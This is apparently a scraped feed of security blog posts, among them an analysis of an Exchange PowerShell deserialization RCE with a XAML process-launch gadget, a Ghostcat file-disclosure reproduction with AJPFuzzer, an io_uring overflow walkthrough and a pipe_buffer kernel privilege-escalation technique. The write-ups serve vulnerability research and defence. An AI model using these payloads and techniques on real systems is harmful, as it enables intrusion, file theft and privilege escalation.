To sum up, some of our types (or members) can be retrieved through BinaryFormatter deserialization. Those types must be included in the SerializationTypeConverter allowlist, though. Moreover, custom converters are last-resort converters. Before they are used, PowerShell Remoting will try to retrieve the object through a constructor or a Parse method.

RCE Payload Walkthrough

It is high time to show you the RCE payload and see what happens during the conversion.
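The payload itself appears as an image in the original post. Reconstructed from the description that follows (the base64 blob and the XAML string are abbreviated placeholders, and the exact tag layout is an approximation), it has roughly this shape:

```xml
<Obj N="Identity" RefId="0">
  <!-- Object type section -->
  <TN RefId="0">
    <T>System.ServiceProcess.ServiceController</T>
    <T>System.Object</T>
  </TN>
  <!-- Properties section -->
  <Props>
    <S N="Name">Type</S>
    <Obj N="TargetTypeForDeserialization" RefId="1">
      <TN RefId="1">
        <T>System.Exception</T>
        <T>System.Object</T>
      </TN>
      <Props>
        <!-- base64-encoded BinaryFormatter blob (UnitySerializationHolder) -->
        <BA N="SerializationData">AAEAAAD...</BA>
      </Props>
    </Obj>
  </Props>
  <!-- Payload section: XAML gadget as a string -->
  <S>&lt;ResourceDictionary ...&gt; ... &lt;/ResourceDictionary&gt;</S>
</Obj>
```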

This XML fragment presents the specification of the “-Identity” argument of the “Get-Mailbox” Exchange Powershell cmdlet. We have divided the payload into three sections: Object type, Properties, and Payload.

·       Object type section – specifies that there will be an object of type System.ServiceProcess.ServiceController.
·       Properties section – specifies the properties of the object. One thing that should catch your attention here is the property with the name TargetTypeForDeserialization. You should also notice the byte array with the name SerializationData. (Note that Powershell Remoting accepts an array of bytes in the form of a base64 encoded string).
·       Payload section – contains XML in the form of a string. The XML is a XAML deserialization gadget based on ObjectDataProvider.

Getting Control over TargetTypeForDeserialization

In the first step, we are going to focus on the Properties section of the RCE payload. Before we do that, let’s quickly look at some fragments of the deserialization code. The majority of the deserialization routines are implemented in the System.Management.Automation.InternalDeserializer class.

Let’s begin with this fragment of the ReadOneObject(out string) method:

At [1], it invokes the ReadOneDeserializedObject method, which may return an object.

At [2], the code flow continues, provided an object has been returned. We will focus on this part later.

Let’s quickly look at the ReadOneDeserializedObject method. It goes through the XML tags and executes appropriate actions, depending on the tag. However, only one line is particularly interesting for us.

At [1], it calls ReadPSObject. This happens when the tag name is equal to “Obj”.

Finally, we analyze a fragment of the ReadPSObject function.

At [1], the code retrieves the type names (strings) from the <TN> tag.

At [2], the code retrieves the properties from the <Props> tag.

At [3], the code retrieves the member set from the <MS> tag.

At [4], the code tries to read the primary type (such as string or byte array).

At [5], the code initializes a new deserialization procedure, provided that the tag is an <Obj> tag.

 

So far, we have seen how InternalDeserializer parses the Powershell Remoting XML. As shown earlier, the Properties section of the payload contains a <Props> tag. It seems that we must look at the ReadProperties method.

At [1], the adaptedMembers property of the PSObject object is set to some PowerShell-related collection.

At [2], the property name is obtained (from the N attribute).

At [3], the code again invokes ReadOneObject in order to deserialize the nested object.

At [4], it instantiates a PSProperty object, based on the deserialized value and the property name.

Finally, at [5], it extends adaptedMembers by adding the new PSProperty. This is a crucial step; pay close attention to it.

Let’s again look at the Properties section of our RCE payload:

We have two properties defined here:

·       The Name property, which is of type string and whose value is the string “Type”.

·       The TargetTypeForDeserialization property, whose value is a complex object specified as follows:

o   The type (TN tag) is System.Exception.
o   There is a value stored as a base64 encoded string, representing a byte array.

We have already seen that nested objects (defined with the Obj tag) are also deserialized with the ReadOneObject method. We have already looked at its first part (object retrieval). Now, let’s see what happens further:

At [1], the code retrieves the Type targetTypeForDeserialization through the GetTargetTypeForDeserialization method.

At [2], the code tries to retrieve a new object through the LanguagePrimitives.ConvertTo method (if GetTargetTypeForDeserialization returned anything). The targetTypeForDeserialization is one of the inputs. Another input is the object obtained with the already analyzed ReadOneDeserializedObject method.

As we have specified the object of the System.Exception type (TN tag), the GetTargetTypeForDeserialization method will return the System.Exception type. Why does the exploit use Exception? For two reasons:

·       It is included in the allowlist exchange.partial.types.ps1xml.
·       It has a custom converter registered: Microsoft.Exchange.Data.SerializationTypeConverter.

 These two conditions are important because they allow the object to be retrieved using the SerializationTypeConverter, which was discussed above as a wrapper for BinaryFormatter. Note that there are also various other types available besides System.Exception that meet the two conditions mentioned here, and those types could be used as an alternative to System.Exception.

 Have you ever tried to serialize an object of type Type? If yes, you probably know that it is serialized as an instance of System.UnitySerializationHolder. If you base64-decode the string provided in the Properties part of our payload, you will quickly realize that it is a System.UnitySerializationHolder with the following properties:

·       m_unityType = 0x04,
·       m_assemblyName = "PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
·       m_data = "System.Windows.Markup.XamlReader".

To sum up, our byte array holds the object, which constructs a XamlReader type upon deserialization! That is why we want to use the SerializationTypeConverter – it allows us to retrieve an object of type Type. An immediate difficulty is apparent here, though, because Exchange’s BinaryFormatter is limited to types on the allowlist. Hence, it’s not clear why the deserialization of this byte array should succeed. Amazingly, though, System.UnitySerializationHolder is included in the SerializationTypeConverter’s list of allowed types!

Let’s see how it looks in the debugger:

Figure 2 - Deserialization leading to the retrieval of the XamlReader Type

Even though the targetTypeForDeserialization is Exception, LanguagePrimitives.ConvertTo returned the Type object for XamlReader (see variable obj2). This happens because the final type of the retrieved object is not verified. Finally, this Type object will be added to the adaptedMembers collection (see the ReadProperties method).

Getting Code Execution Through XamlReader, or Any Other Class

We have already deserialized the TargetTypeForDeserialization property, which is a Type object for the XamlReader type. Perfect! As you might expect, allowing users to obtain an arbitrary Type object through deserialization is not the best idea. But we still need to understand: why does PowerShell Remoting respect such a user-defined property? To begin answering this, let’s consider what the code should do next:

·       It should deserialize the <S> tag defined after the <Props> tag (payload section of the input XML). This is a primitive string type, thus it retrieves the string.
·       It should take the type of the main object, which is defined in the <TN> tag (here: System.ServiceProcess.ServiceController).
·       It should try to create the System.ServiceProcess.ServiceController instance from the provided string.

Our goal is to switch types here. We want to perform a conversion so that the System.Windows.Markup.XamlReader type is retrieved from the string. Let’s analyze the GetTargetTypeForDeserialization function to see how this can be achieved.

At [1], it tries to retrieve an object of the PSMemberInfo type using the GetPSStandardMember method. It passes two parameters: backupTypeTable (this contains the Powershell Remoting allowed types/converters) and the hardcoded string “TargetTypeForDeserialization”.

At [2], the code retrieves the Value member from the obtained object and tries to cast it to Type. When successful, the Type object will be returned. If not, null will be returned.

The GetPSStandardMember method is not easy to understand, especially when you are not familiar with the classes and methods used here. However, I will try to summarize it for you in two points:

At [1], the PSMemberSet object is retrieved through the TypeTableGetMemberDelegate method. It takes our specified type (here, System.ServiceProcess.ServiceController) and compares it against the list of allowed types. If the provided type is allowed, it will extract its properties and create the new member set.

The following screenshot presents the PSMemberSet retrieved for the System.ServiceProcess.ServiceController type:

Figure 3 - PSMemberSet retrieved for the System.ServiceProcess.ServiceController type

At [2], the collection of members is created from multiple sources. If a member is not included in the basic member set (obtained from the list of allowed types), it will try to find such a member in a different source. This collection includes the adapted members, which contain the deserialized properties obtained through the Props tag.

Finally, it will try to retrieve the TargetTypeForDeserialization member from the final collection.

Let’s have a quick look at the specification of the System.ServiceProcess.ServiceController in the list of allowed types. It is defined in the default Powershell Remoting types list, located in C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml.

As you can see, this type does not have the TargetTypeForDeserialization member specified; only the DefaultDisplayPropertySet member is defined. Accordingly, the targetTypeForDeserialization will be retrieved from adaptedMembers. As the Exchange SerializationTypeConverter allows us to retrieve a Type through deserialization, we can provide a new conversion type through adaptedMembers!

The following screenshot presents the obtained PSMemberInfo, which defines the XamlReader type:

Figure 4 - Retrieved XamlReader type

Success! GetTargetTypeForDeserialization returned the XamlReader type. You probably remember that PowerShell Remoting contains several converters, one of which allows calling the Parse(String) method. That means we can call the XamlReader.Parse(String) method, where the input will be equal to the string provided in the <S> tag. Let’s quickly verify it with the debugger.

The following screenshot presents the debugging of the LanguagePrimitive.ConvertTo method. The resultType is indeed equal to the XamlReader:

Figure 5 - Debugging of the ConvertTo method - resultType

The next screenshot presents the valueToConvert argument. It includes the string (XAML gadget) included in our payload:

Figure 6 - Debugging of the ConvertTo method - valueToConvert

We will soon reach the LanguagePrimitives.FigureParseConversion method. The following screenshot illustrates debugging this method. One can see that:

·       fromType is equal to String.
·       toType is equal to XamlReader.
·       methodInfo contains the XamlReader.Parse(String string) method.

Figure 7 – Debugging the LanguagePrimitives.FigureParseConversion method

Yes! We have been able to get the XamlReader.Parse(String string) method through reflection! We also fully control the input that will be passed to this function. Finally, it will be invoked through the System.Management.Automation.LanguagePrimitives.ConvertViaParseMethod.ConvertWithoutCulture method, as presented in the following screenshot:

Figure 8 - Execution of the XamlReader.Parse method

As you may be aware, XamlReader allows us to achieve code execution through loading XAML (see ysoserial.net). When we continue the process, our command gets executed.
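For reference, a typical ObjectDataProvider-based XAML gadget of the kind produced by ysoserial.net looks like the following (the command here is an arbitrary example, not the one used in the actual attacks):

```xml
<ResourceDictionary
    xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation"
    xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml"
    xmlns:d="clr-namespace:System.Diagnostics;assembly=system"
    xmlns:s="clr-namespace:System;assembly=mscorlib">
  <!-- ObjectDataProvider invokes Process.Start with attacker-chosen args -->
  <ObjectDataProvider x:Key="launch" ObjectType="{x:Type d:Process}"
                      MethodName="Start">
    <ObjectDataProvider.MethodParameters>
      <s:String>cmd</s:String>
      <s:String>/c calc.exe</s:String>
    </ObjectDataProvider.MethodParameters>
  </ObjectDataProvider>
</ResourceDictionary>
```

Parsing this markup is enough; no further interaction with the returned object is needed, because the provider invokes the method during load.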

Figure 9 - Remote Code Execution through the Exchange PowerShell backend

There are also plenty of other classes besides XamlReader that could be abused in a similar way. For example, you can call the single-argument constructor of any type, so you can be creative here!

TL;DR – Summary

Getting to understand this vulnerability has been a long and complicated process. I hope that I have provided enough details for you to understand this issue. I would like to summarize the whole Microsoft Exchange chain in several points:

  • The path confusion in the Autodiscover service (CVE-2021-34473) was not fixed, but rather restricted to unauthenticated users. Authenticated users can still easily abuse it using Basic or NTLM authentication.
  • PowerShell Remoting allows us to perform object deserialization/conversion operations.
  • PowerShell Remoting includes several powerful converters, which can:
      • Call the public single-argument constructor of the provided type.
      • Call the public Parse(String) method of the provided type.
      • Retrieve an object through reflection.
      • Call custom converters.
      • Perform other conversions as well.
  • PowerShell Remoting implements a list of allowed types, so an attacker cannot (directly) invoke converters to instantiate arbitrary types.
  • However, the Exchange custom converter named SerializationTypeConverter allows us to obtain an arbitrary object of type Type.
  • This can be leveraged to fully control the type that will be retrieved through a conversion.
  • The attacker can abuse this behavior to call the Parse(String) method or the public single-argument constructor of almost any class while controlling the input argument.
  • This behavior easily leads to remote code execution. This blog post illustrates exploitation using the System.Windows.Markup.XamlReader.Parse(String) method.

It was not clear to us how Microsoft was going to approach fixing this vulnerability. Direct removal of the System.UnitySerializationHolder from the SerializationTypeConverter allowlist might cause breakage to Exchange functionality. One potential option was to restrict the returned types, for example, by restricting them to the types in the “Microsoft.Exchange.*” namespace. Accordingly, I started looking for Exchange-internal exploitation gadgets. I found more than 20 of them and reported them to Microsoft to help them with their mitigation efforts. That effort appears to have paid off. Microsoft patched the vulnerability by restricting the types that can be returned through the deserialization of System.UnitySerializationHolder according to a general allowlist, and then restricting them further according to a specific denylist. It seems that the gadgets I reported had an influence on that allowlist. I will probably detail some of those gadgets in a future blog post. Stay tuned for more…

Summary

I must admit that I was impressed with this vulnerability. The researcher clearly invested a good amount of time to fully understand the details of PowerShell Remoting, analyze Exchange custom converters, and find a way to abuse them. I had to take my analysis to another level to fully understand this bug chain and look for potential variants and alternate gadgets.

Microsoft patched these bugs in the November release. They also published a blog post with additional workarounds you can employ while you test and deploy the patches. You should also make sure you have the September 2021 Cumulative Update (CU) installed, which adds the Exchange Emergency Mitigation service. This service automatically installs available mitigations and sends diagnostic data to Microsoft. Still, the best way to prevent exploitation is to apply the most current security updates as they are released. We expect more Exchange patches in the coming months.

In a future blog post, I will describe some internal Exchange gadgets that can be abused to gain remote code execution, arbitrary file reads, or denial-of-service conditions. These have been reported to Microsoft, but we are still waiting for these bug reports to be addressed with patches. Until then, you can follow me @chudypb and follow the team on Twitter or Instagram for the latest in exploit techniques and security patches.

Control Your Types or Get Pwned: Remote Code Execution in Exchange PowerShell Backend

Threat Actors Taking Advantage of FTX Bankruptcy 

15 November 2022 at 18:23

Authored by Oliver Devane 

It hasn’t taken malicious actors long to take advantage of the recent bankruptcy filing of FTX: McAfee has discovered several phishing sites targeting FTX users.

One of the sites discovered was registered on the 15th of November and asks users to submit their crypto wallet recovery phrase to receive a refund. After entering this phrase, the creators of the site would gain access to the victim’s crypto wallet and would likely transfer all the funds out of it.

Upon analyzing the website code used to create the phishing sites, we noticed that they were extremely similar to previous sites targeting WalletConnect customers, so it appears that they likely just modified a previous phishing kit to target FTX users.  

The image below shows a code comparison with a website from June 2022, revealing that the FTX phishing site shares most of its code with it.

McAfee urges anyone who was using FTX to be wary of any unsolicited emails or social media messages they receive and to double-check their authenticity before accessing them. If you are unsure of the signs to look for, please check out the McAfee Scam education portal (https://www.mcafee.com/consumer/en-us/landing-page/retention/scammer-education.html)

McAfee customers are protected against the sites mentioned in this blog 

Type | Value                  | Product           | Detected
URL  | ftx-users-refund[.]com | McAfee WebAdvisor | Blocked
URL  | ftx-refund[.]com       | McAfee WebAdvisor | Blocked

 

The post Threat Actors Taking Advantage of FTX Bankruptcy  appeared first on McAfee Blog.

Microsoft’s Edge over Popups (and Google Chrome)

15 November 2022 at 17:02

Following up on our previous blog, How to Stop the Popups, McAfee Labs saw a sharp decrease in the number of deceptive push notifications reported by McAfee consumers running Microsoft’s Edge browser on Windows.

Such browser-delivered push messages appear as toaster pop-ups in the tray above the system clock and are meant to trick users into taking various actions, such as installing software, purchasing a subscription, or providing personal information.

example of a deceptive push notification

Upon further investigation, this major drop seems to be associated with a change in the behavior of the Edge browser with two notable improvements over older versions.

First, when users visit websites known to deliver deceptive push notifications, Edge blocks authorization prompts that could trick users into opting in to receive popups:

Second, when unwanted popups do occur, it is now easier than ever to disable them, on a per-site basis.  Users can simply click the three dots (…) on the right of the notification and choose to “Turn off all notifications for” the domain responsible for the popup.

This is a great improvement over the previous experience of having to manually navigate browser settings to achieve the desired result.

Earlier this year, 9TO5Google reported that a Chrome code change may be indicative of a similar crackdown by Google on nefarious popups.

One can hope Google will follow Microsoft’s example to improve browser security and usability.

The post Microsoft’s Edge over Popups (and Google Chrome) appeared first on McAfee Blog.

Let's speak AJP

14 November 2022 at 23:00

Introduction

AJP (Apache JServ Protocol) is a binary protocol developed in 1997 with the goal of improving the performance of the traditional HTTP/1.1 protocol, especially when proxying HTTP traffic between a web server and a J2EE container. It was originally created to efficiently manage network throughput while forwarding requests from server A to server B.

A typical use case for this protocol is shown below: AJP schema

During one of my recent research weeks at Doyensec, I studied and analyzed how this protocol works and its implementation within some popular web servers and Java containers. The research also aimed at reproducing the infamous Ghostcat (CVE-2020-1938) vulnerability discovered in Tomcat by Chaitin Tech researchers, and potentially discovering other look-alike bugs.

Ghostcat

This vulnerability affected the AJP connector component of the Apache Tomcat Java servlet container, allowing malicious actors to perform local file inclusion from the application root directory. In some circumstances, this issue would allow attackers to perform arbitrary command execution. For more details about Ghostcat, please refer to the following blog post: https://hackmag.com/security/apache-tomcat-rce/

Communicating via AJP

Back in 2017, our own Luca Carettoni developed and released one of the first, if not the first, open source libraries implementing the Apache JServ Protocol version 1.3 (ajp13). With that, he also developed AJPFuzzer. Essentially, this is a rudimentary fuzzer that makes it easy to send handcrafted AJP messages, run message mutations, test directory traversals and fuzz arbitrary elements within the packet.

With minor tuning, AJPFuzzer can be also used to quickly reproduce the GhostCat vulnerability. In fact, we’ve successfully reproduced the attack by sending a crafted forwardrequest request including the javax.servlet.include.servlet_path and javax.servlet.include.path_info Java attributes, as shown below:

$ java -jar ajpfuzzer_v0.7.jar

$ AJPFuzzer> connect 192.168.80.131 8009
connect 192.168.80.131 8009
[*] Connecting to 192.168.80.131:8009
Connected to the remote AJP13 service

Once connected to the target host, send the malicious ForwardRequest packet message and verify the disclosure of the test.xml file:

$ AJPFuzzer/192.168.80.131:8009> forwardrequest 2 "HTTP/1.1" "/" 127.0.0.1 192.168.80.131 192.168.80.131 8009 false "Cookie:test=value" "javax.servlet.include.path_info:/WEB-INF/test.xml,javax.servlet.include.servlet_path:/"


[*] Sending Test Case '(2) forwardrequest'
[*] 2022-10-13 23:02:45.648


... trimmed ...


[*] Received message type 'Send Body Chunk'
[*] Received message description 'Send a chunk of the body from the servlet container to the web server.
Content (HEX):
0x3C68656C6C6F3E646F79656E7365633C2F68656C6C6F3E0A
Content (Ascii):
<hello>doyensec</hello>
'
[*] 2022-10-13 23:02:46.859


00000000 41 42 00 1C 03 00 18 3C 68 65 6C 6C 6F 3E 64 6F AB.....<hello>do
00000010 79 65 6E 73 65 63 3C 2F 68 65 6C 6C 6F 3E 0A 00 yensec</hello>..


[*] Received message type 'End Response'
[*] Received message description 'Marks the end of the response (and thus the request-handling cycle). Reuse? Yes'
[*] 2022-10-13 23:02:46.86

The server AJP connector will receive an AJP message with the following structure:

AJP schema wireshark
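As a sketch of the framing shown above (per the AJP13 spec, client-to-container packets start with the magic bytes 0x12 0x34, followed by a 2-byte big-endian payload length and a payload whose first byte is the message type), a minimal packet builder looks like this:

```python
import struct

def ajp_packet(payload: bytes) -> bytes:
    # Client -> container framing: magic 0x12 0x34, then 2-byte payload length
    return struct.pack(">HH", 0x1234, len(payload)) + payload

# CPing (message type 10): the container should answer with CPong (type 9)
cping = ajp_packet(bytes([10]))
assert cping == b"\x12\x34\x00\x01\x0a"
```

Container-to-client packets use the `AB` magic instead, as visible in the Send Body Chunk hexdump above.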

The combination of libajp13, AJPFuzzer and the Wireshark AJP13 dissector made it easier to understand the protocol and play with it. For example, another noteworthy test case in AJPFuzzer is named genericfuzz. By using this command, it’s possible to perform fuzzing on arbitrary elements within the AJP request, such as the request attributes name/value, secret, cookies name/value, request URI path and much more:

$ AJPFuzzer> connect 192.168.80.131 8009
connect 192.168.80.131 8009
[*] Connecting to 192.168.80.131:8009
Connected to the remote AJP13 service

$ AJPFuzzer/192.168.80.131:8009> genericfuzz 2 "HTTP/1.1" "/" "127.0.0.1" "127.0.0.1" "127.0.0.1" 8009 false "Cookie:AAAA=BBBB" "secret:FUZZ" /tmp/listFUZZ.txt

AJP schema fuzz

Takeaways

Web binary protocols are fun to learn and reverse engineer.

For defenders:

  • Do not expose your AJP interfaces in hostile networks. Instead, consider switching to HTTP/2
  • Protect the AJP interface by enabling a shared secret. In this case, the workers must also include a matching value for the secret

CVE-2021-3491: Triggering a Linux Kernel io_uring Overflow

14 November 2022 at 10:15

Introduction:

Linux kernel vulnerability research has been a hot topic lately, and a lot of great research papers have been published. One topic in particular caught our interest: io_uring.

At Haboob, we decided to start a small research project to investigate one of the published CVEs, specifically CVE-2021-3491.

Throughout this blogpost, we will explain io_uring fundamentals, its use case and the advantages it offers. We’ll also walk through CVE-2021-3491 from root cause to PoC development.

Everyone loves kernel bugs, it seems, so buckle up for a fine ride!

Why io_uring?

io_uring is a new subsystem that is rapidly changing and improving. It’s ripe for research!

It’s very interesting to see how it internally works and how it interacts with the kernel.

io_uring: What is it?

According to the manuals: io_uring is a Linux-specific API for asynchronous I/O. It allows the user to submit one or more I/O requests, which are processed asynchronously without blocking the calling process. io_uring gets its name from ring buffers which are shared between user space and kernel space. This arrangement allows for efficient I/O, while avoiding the overhead of copying buffers between them, where possible. This interface makes io_uring different from other UNIX I/O APIs, wherein, rather than just communicate between kernel and user space with system calls, ring buffers are used as the main mode of communication.


Root Cause:

After checking the io_uring source code commit changes in fs/io_uring.c, we start tracing the differences between the patched and unpatched versions to identify the root cause of the bug.

We first notice that in struct io_buffer, the “len” field is defined as a signed int32 and is used as the buffer length.



Then, we also notice that in io_add_buffers, when attempting to access the struct, buf->len is assigned without checking the data type or MAX_RW_COUNT.



We found that there is a multiplication (p->len * p->nbufs) in io_provide_buffers_prep which leads to an integer overflow when p->len > 0x7fffffff. This bypasses the access check performed by the access_ok() function call.
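The 32-bit wraparound is easy to reproduce outside the kernel. A quick sketch with illustrative values (a len just over the 0x7fffffff threshold and an nbufs of 2; these are chosen for demonstration, not taken from the exploit):

```python
def u32(x):
    # Emulate truncation of a 32-bit multiplication
    return x & 0xffffffff

plen, nbufs = 0x80000000, 2
total = u32(plen * nbufs)
assert total == 0  # the product wraps to 0, so the size check passes trivially
```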



When we perform the IORING_OP_READV operation with the selected buffer, we can bypass MAX_RW_COUNT:



Using “R/W” on “/proc/self/mem” will force the kernel to handle our request using the mem_rw function. Among its arguments, “count” is received as a size_t and then passed to min_t() as an int, which yields a negative number in “this_len”.

The access_remote_vm function then receives “this_len” as a negative number, which results in copying more than PAGE_SIZE bytes into the page, causing a heap overflow.
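The signedness issue can likewise be sketched with ctypes (illustrative values; the real mem_rw clamps against PAGE_SIZE minus the in-page offset):

```python
import ctypes

PAGE_SIZE = 4096
count = 0x80000000                    # size_t-sized count from the request
as_int = ctypes.c_int32(count).value  # min_t(int, ...) reinterprets it as int
this_len = min(as_int, PAGE_SIZE)
assert this_len == -2147483648        # a negative length reaches access_remote_vm()
```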



Triggering the Bug:

We will go through the details of how the bug is triggered to achieve a heap overflow that results in a kernel panic.

 

Step 1:

The following code snippet will interact with “proc” to open a file descriptor for “/proc/self/mem” and extract an address from “/proc/self/maps” to attempt to read from it:

Step 2:

We need to prepare the buffer using the function “io_uring_prep_provide_buffers()” with length 0x80000000 to trigger the integer overflow vulnerability:

Step 3:

Using an iovec struct with a two-dimensional buffer, we assign “len” as 0x80000000 to bypass MAX_RW_COUNT:

Step 4:

When we perform the IORING_OP_READV operation on “file_fd” using offset “start_address”, we can read the contents of “/proc/self/mem” at that offset using the selected buffer:


PoC

We can trigger kernel panic with the following PoC:


Resources

https://manpages.ubuntu.com/manpages/lunar/man7/io_uring.7.html

https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=d1f82808877bb10d3deee7cf3374a4eb3fb582db


pipe_buffer arbitrary read write

By: Jayden R
8 November 2022 at 09:10

Introduction

In this post we will look at an arbitrary read/write technique that can be used to achieve privilege escalation in a variety of Linux kernel builds. This has been used practically against Ubuntu builds, but the technique is amenable to other targets such as Android. It is particularly useful in cases where ARM64 User Access Override mitigates the common technique of setting addr_limit to ULONG_MAX.  

The pipe_buffer technique was discovered independently by the author, but a recent Black Hat talk suggested the technique is being used in the wild. The technique provides an intuitive way to gain arbitrary read/write, so we suspect that it’s been used widely for a long time.

The technique

The technique targets the page pointer of a pipe buffer. In ordinary pipe operations, this page stores data which was written through a pipe. The data may then be loaded from the page into userspace through a read operation. By overwriting said page pointer we’re able to read from and write to arbitrary locations in the physical address space. This includes the kernel heap, targeting sensitive objects such as task descriptors and credentials, as well as the writable pages of the kernel image itself.

struct pipe_buffer

The pipe_buffer array is a common heap-allocated structure targeted in Linux kernel exploitation. By leaking a pipe_buffer element, we are able to deduce the kernel (virtual) base address. In overwriting the pipe_buffer we’re typically able to gain code execution. 

Each pipe is managed by the pipe_inode_info data structure. The pipe_buffer array comes automatically with every pipe. It is pointed to by the field pipe_inode_info::bufs and is treated as a ring through the pipe_inode_info::tail and pipe_inode_info::head indices.  

The array is allocated from the memcg slab caches. It may be a variety of sizes. In particular we can have our pipe_buffer array be of size n * sizeof(struct pipe_buffer) where n is a power of 2. With fcntl(pipe_fd, F_SETPIPE_SZ, PAGE_SIZE * n) we can alter the pipe ring size.  
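A minimal sketch of resizing a pipe ring from userspace (Linux-only; the F_SETPIPE_SZ value 1031 is hardcoded as a fallback for Python builds whose fcntl module predates the named constant):

```python
import fcntl
import os

F_SETPIPE_SZ = getattr(fcntl, "F_SETPIPE_SZ", 1031)  # Linux-specific fcntl command

r, w = os.pipe()
# Ask for an 8-page ring: the kernel backs this with an 8-element pipe_buffer array
actual = fcntl.fcntl(w, F_SETPIPE_SZ, 4096 * 8)
assert actual >= 4096 * 8  # the kernel may round the size up
os.close(r)
os.close(w)
```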

A single element in the pipe_buffer array is structured as follows: 

struct pipe_buffer { 
       struct page *page; 
       unsigned int offset, len; 
       const struct pipe_buf_operations *ops; 
       unsigned int flags; 
       unsigned long private; 
}; 

The typical leak and overwrite target is the pipe_buf_operations pointer. This is great if a ROP chain is sufficient to gain full privileges, however on some platforms such as Android this is not sufficient. For arbitrary read/write we will use the page pointer instead. 

struct page

The kernel represents physical memory using struct page objects. These are all stored in a single array which we will call vmemmap_base (its symbol on some common platforms).  

When we write to a pipe, the kernel reserves a new page to store our data. This page can then be spliced onto other pipes or have its contents copied back out from the read-side of the pipe. 

static ssize_t pipe_write(struct kiocb *iocb, struct iov_iter *from) 
{ 
. . . 
       for (;;) { 
. . . 
              if (!pipe_full(head, pipe->tail, pipe->max_usage)) { 
. . . 
                     struct page *page = pipe->tmp_page; 
. . . 
                     if (!page) { 
                            page = alloc_page(GFP_HIGHUSER | __GFP_ACCOUNT); 
                            if (unlikely(!page)) { 
                                   ret = ret ? : -ENOMEM; 
                                   break; 
                            } 
                            pipe->tmp_page = page; 
                     } 
. . . 
/* Insert it into the buffer array */ 
buf = &pipe->bufs[head & mask]; 
buf->page = page; 
buf->ops = &anon_pipe_buf_ops; 
buf->offset = 0; 
buf->len = 0; 
. . . 
copied = copy_page_from_iter(page, 0, PAGE_SIZE, from); 

As we can see here, alloc_page() returns a new page from the page allocator. A pipe_buffer is then initialised to encapsulate the page. The user-supplied contents are copied into it. The exact mechanics of the page allocator is outside the scope of this post, but just think of it as a free-list of available physical pages.  

The central question for this technique is: assuming we can corrupt a pipe_buffer, are we able to set pipe_buffer::page to the struct page representing a sensitive region of memory? We will look at two applications. The first targets heap memory and involves straightforward arithmetic. The second targets the kernel image itself and may require some additional brute-forcing. 

Read and write into the kernel heap 

We will further split this into two cases. In the first case, we assume that we know where a target object is in the heap. In the second case, we assume that we don’t know where a target object is in memory and we need to find it.

With only a leaked struct page pointer we can:

  • Deduce the vmemmap_base address
  • Calculate the physical page loadpoint of the heap base
  • Repeatedly increment, scale, and rewrite the page pointer to seek across the heap

Suppose we’re targeting the object with virtual address 0xffff98784d431d00 and we’ve leaked the struct page address 0xffffebea044d9f00. Both are randomized with KASLR. 

Through the mask 0xfffffffff0000000 & 0xffffebea044d9f00 we get 0xffffebea00000000 for vmemmap_base.

First, we ask the question: how can we choose the struct page which corresponds to the target object in the heap? Clearly, this target struct page will be vmemmap + offset. But what offset? Since the vmemmap array corresponds directly to physical memory and since the heap base is not typically (physically) randomized, we can use the simple formula:

vmemmap_base
+ ((0x100000000 >> 12) * 0x40)
+ (((target_object & 0xffffffff) >> 12) * 0x40) 

Indexing the target object’s page

The result of this formula gives the virtual address for the struct page element of the vmemmap array corresponding to the physical page which underlies our target object. A few questions remain: what is that 0x100000000? Why shift by 12? Why scale by 0x40? 

Luckily for us, the physical heap base is not randomized. It starts at physical address 0x100000000. The 12-shift returns the “index” of the page in memory. For example, the address 0x100000000 corresponds to the 0x100000000 >> 12 page of memory. Finally, the 0x40-scale corrects the byte offset in the vmemmap_base array according to the size of the elements. In other words, 0x40 is the size of a single struct page. The analogous operation is:
int x[N]; int y = x[3]; which retrieves the value at &x + (3 * sizeof(int))

So in plain words, the formula says: 
Take the vmemmap base address and displace up to the struct page of the first physical page of heap memory. Then displace by the number of pages between the bottom of the heap and the target object.
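The formula can be sketched as follows, using the example addresses from above (the 0x100000000 physical heap base and 0x40 struct page size are assumptions about the target build):

```python
PAGE_SHIFT = 12
STRUCT_PAGE_SIZE = 0x40
PHYS_HEAP_BASE = 0x100000000  # not physically randomized on the target builds

def virt_to_page(target_object, vmemmap_base):
    # struct page of the first physical heap page...
    heap_page0 = (PHYS_HEAP_BASE >> PAGE_SHIFT) * STRUCT_PAGE_SIZE
    # ...plus the page index of the target object within the heap
    obj_page = ((target_object & 0xffffffff) >> PAGE_SHIFT) * STRUCT_PAGE_SIZE
    return vmemmap_base + heap_page0 + obj_page

vmemmap_base = 0xffffebea044d9f00 & 0xfffffffff0000000  # 0xffffebea00000000
page = virt_to_page(0xffff98784d431d00, vmemmap_base)
print(hex(page))  # 0xffffebea05350c40
```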

If we set the pipe_buffer::page to the result then we will be able to read/write to the page of the target object. Note that objects can lie over multiple pages. So it’s important to determine the page relative to the target field(s) of an object rather than just from the beginning of the object.  

This can be used to set the pipe_buffer fields as follows: 

uint64_t cred_page = virt_to_page(target_obj, vbase); 
uint64_t cred_off = (target_obj & 0xfff); 
 
pbuf->page = (long *)cred_page; 
pbuf->offset = cred_off + 0x4; 
pbuf->len = 0; 
pbuf->ops = (long *)FAKE_OPS; 
pbuf->flags = PIPE_BUF_FLAG_CAN_MERGE; 
pbuf->private = 0; 
... 
write(dest_pipe.wr, zeroes, 0x20); 

where virt_to_page() is the implementation of the formula. As the reader can see, we targeted the cred object of our task, overwriting the *id fields with zeroes to escalate privileges. This assumes we already know the virtual address of our task credentials.

Manipulating the page pointer of a pipe buffer

On the other hand, we might not yet know the address. In this case we would need to seek through the heap to identify our task_struct and then our struct cred. One way to do this is to use prctl() to change our task’s name just before searching for it. Since prctl() changes the task_struct::comm field to the new name, we can use this, as well as some other determinants, to confirm that we’ve found the task_struct.

To do this, we loop with i over (vmemmap_base + ((0x100000000 >> 12) * 0x40)) + (0x40 * i), writing it back as the pipe_buffer::page. We can then repeatedly leak heap memory, halting when we find our task_struct. Once we’ve read out this final leak we’ll have our cred virtual address. From here, we are in the first case again as shown above. This likely means we need to retrigger the vulnerability a substantial number of times.  

Avoiding reallocation

One possible scenario is when we know the address of our object replacement in memory but not the address of our target object. For example, we know the address of a msg_msgseg which has overlaid a pipe_buffer array but not the address of the credentials which we ultimately need to overwrite.  

